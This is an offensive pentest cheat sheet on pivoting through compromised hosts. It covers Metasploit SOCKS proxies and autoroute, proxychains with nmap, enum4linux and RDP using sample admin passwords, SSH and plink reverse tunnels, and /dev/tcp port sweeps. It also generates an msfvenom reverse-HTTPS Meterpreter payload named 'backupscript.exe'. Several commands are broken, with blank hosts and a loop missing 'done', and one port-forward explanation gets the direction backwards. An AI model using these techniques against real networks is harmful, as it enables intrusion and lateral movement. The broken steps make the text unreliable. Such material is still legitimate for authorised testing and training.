# Pivoting and double pivoting
#### Setting Up SOCKS4a Proxy and Proxychains
* **Configure Metasploit's SOCKS4a Proxy Service**:
```bash
use auxiliary/server/socks4a
set SRVPORT 9050
```
This command sets up a SOCKS4a proxy server on port 9050 using Metasploit.
* **Configure Proxychains4**:
```bash
cat /etc/proxychains4.conf
socks5 127.0.0.1 9050
```
Edit the Proxychains configuration file to ensure it routes through the SOCKS5 proxy on localhost at port 9050.
You can also configure how proxychains uses the list of proxies you’ve provided. These can be dynamic, strict, round-robin, or random chains.
* **Dynamic Chain**: With this setting, the tool will attempt to use the proxies in the listed order. However, if one fails, it’ll skip it and move on to the next one.
* **Strict Chain**: Every proxy is used in the listed order, from the first to the second, third, and so on. If one proxy fails, the entire connection fails.
* **Round-Robin Chain**: The chained proxies are used circularly to distribute the connection amongst the provided proxies. Each connection request goes to the next one in the list, and once it reaches the end, it starts over again at the beginning.
* **Random Chain**: As the name suggests, a random chain selects proxies for each connection in a random order. It does not use the proxies in order and provides a unique path through each listed proxy.
Uncomment the desired chain to be used in the file
#### Verify Proxy Service and Use Proxychains with Nmap
* **Verify the Process Running**:
```bash
netstat -atn
```
Use `netstat` to verify the proxy service is running on the desired port.
* **Scan Network via Proxychains Using Nmap**:
```bash
proxychains nmap -sT -Pn
proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445
```
Use Proxychains with Nmap to scan a target machine through the proxy.
#### Pivoting and Network Scanning
* **Set Up Autoroute via Metasploit Session**:
```bash
use post/multi/manage/autoroute
set session
exploit
```
Configure autoroute for a Metasploit session to route traffic through a compromised machine's subnet.
#### Enumeration and Remote Desktop Protocol (RDP) via proxychains
* **Run Enumeration with Proxychains**:
```bash
sudo proxychains -q enum4linux -a -u administrator -p Pa$$w0rd 192.168.5.100
```
Use Proxychains to run the `enum4linux` script, targeting a specific machine for enumeration.
* **Use RDP via Proxychains**:
```bash
proxychains rdesktop -u administrator -p Pa$$w0rd123 192.168.5.100:3389
```
Connect to a machine using Remote Desktop Protocol through Proxychains.
#### SSH Port Forwarding
* **Perform Multiple Local Port Forwardings with SSH**:
```bash
ssh root@192.168.110.10 -L 3389:192.168.110.138:3389 -L 5985:192.168.110.138:5985 -L 5986:192.168.110.131:5985
```
Forward multiple ports from a target machine to the local machine using an SSH connection.
* **Perform Simple Port Forwarding**:
```bash
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
```
Forward port 80 of the target host (172.16.0.10) to port 8000 on the local machine, running SSH in the background with `-fN`.
#### Reverse Shell and Port Forwarding with Metasploit via pivoting
* This guide demonstrates how to set up a remote port forwarding configuration and generate a Meterpreter payload for penetration testing.
1. **Remote Port Forwarding Setup:**
Use SSH to set up remote port forwarding. This enables rerouting connections from a remote server to a local service.
```bash
ssh -R 192.168.5.45:4444:0.0.0.0:4444 vagrant@192.168.56.200 -vN
```
Now, forward traffic to another internal pivot host by specifying the internal IP and desired port:
```bash
ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN
```
2. **Generate Meterpreter Payload:**
Create a reverse HTTPS Meterpreter payload using `msfvenom`. This payload should connect back to your pivot host's internal IP.
```bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST= -f exe -o backupscript.exe LPORT=8080
```
**Note:** Ensure you replace `` and `` with actual IP addresses. Remember to set the internal IP of the pivot host as LHOST during the payload creation.
* **Metasploit Commands for Port Forwarding**:
```bash
portfwd
route
arp
getproxy
```
* `portfwd`: Port forward a port from the remote machine.
* `route`: Manage routes within Metasploit.
* `arp`: View or manipulate the ARP cache.
* `getproxy`: Create a proxy within Metasploit.
## Reverse port forwarding
To implement reverse port forwarding when you have a shell on a machine but no SSH access, follow these steps. This technique allows the target machine to open a tunnel back to your attacking system. Reverse port forward is useful for machines where you have a shell but no SSH. You can then make a reverse port forward by having the tunnel created from the target to you attacking box.
```bash
# Generate an SSH key pair if you don't have one
ssh-keygen
```
**Explanation:** This command creates a private and public SSH key pair, essential for secure connections.
```bash
# Edit the authorized keys on your machine to restrict the key to port forwarding only
echo 'command="echo This account can only be used for port forwarding",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa ...' >> ~/.ssh/authorized_keys
```
**Explanation:** This restriction ensures the key is only used for port forwarding, preventing shell access to your attacking machine.
```bash
# Check the status of the SSH service
sudo systemctl status ssh
```
**Explanation:** Use this command to ensure the SSH service is running correctly on your system.
```bash
# Optionally, kill a specific SSH connection if needed
sudo kill [PID]
```
**Explanation:** Replace `[PID]` with the process ID of the SSH connection you wish to terminate.
```bash
# Set up reverse port forwarding
# ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
ssh -R 22:172.16.0.100:2222 kali@172.16.0.200 -i id_rsa -fN
```
**Explanation:** This command creates a reverse port forwarding from port 22 of the remote machine (172.16.0.100) to port 2222 of your local machine, using the keyfile `id_rsa`. The `-fN` option backgrounds the session after setting up the tunnel. This sets up a tunnel from the target's port 22 to your local machine's port 2222.
## Discover hosts through a pivot using Living Of The Land tools
This is useful if the target does not have nmap installed of if you do not want to make a lot of noises while scanning the internal network. We can use Living Of The Land tools that are build in.
1. **Linux: Discovering Live Hosts on a Network:**
This Bash one-liner will ping each IP address in the range of 192.168.1.1 to 192.168.1.255, reporting back any live hosts that respond to the ping.
```basic
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done
```
2. **Linux : Scanning Open Ports on a Target:**
This command will attempt to connect to each port from 1 to 65535 on the target IP (192.168.1.1) and will report any open ports.
```bash
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open;
```
{% embed url="" %}
## Pivoting and double pivoting (SSH Dynamic port forwarding)
To configure SSH dynamic port forwarding, use the following commands:
1. **Edit the /etc/proxychains.conf**
1. Add the following line to create a proxychain on your localhost on port 1080
```basic
Cat etc/proxychains4.conf
socks5 127.0.0.1 1080
```
2. **Initiate Dynamic Port Forwarding**
To set up dynamic port forwarding over SSH, use the following command. This example listens on port `1080` and forwards traffic through the specified `username@hostname`:
```bash
ssh -D 1080 username@hostname
```
This command establishes an SSH tunnel that acts as a SOCKS proxy, allowing you to route traffic securely.
1. **Add Options for Background Operation**
To run the SSH session in the background, which is useful for maintaining the tunnel without keeping an active terminal session open, use the `-f` option:
```bash
ssh -D 1080 -f -C -q -N username@hostname
```
* `-f`: Requests SSH to go to the background just before command execution.
* `-C`: Enables compression of data, if possible.
* `-q`: Quiet mode; suppresses most warning and diagnostic messages.
* `-N`: Tells SSH not to execute a remote command, useful for just forwarding ports.
2. Proxychains \
1. Once the tunnel is established we can use proxychains with our favorite tool to reach the internal network
```bash
proxychains curl http://192.168.69.102
proxychains nmap
proxychains hydra
```
## Splink.exe - Windows only
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers; however, it is still a very useful tool, so we will cover it here.
```bash
# Creates a reverse port forward from the target to your attacking box
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
```
**2. Example of Reverse Port Forwarding**
```bash
# Forwards a connection from 172.16.0.10:80 to port 8000 on your attacking machine (172.16.0.20)
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
```
**3. Convert SSH Key for Plink**
```bash
# Converts an SSH key to a format usable by Plink
puttygen KEYFILE -o OUTPUT_KEY.ppk
```
**4. Install putty-tools on Kali Linux**
```bash
# Installs the putty-tools package on Kali Linux
sudo apt install putty-tools
```
These commands cover the process of setting up reverse port forwarding using `plink.exe`, converting SSH keys for use with Plink, and installing necessary tools on Kali Linux.
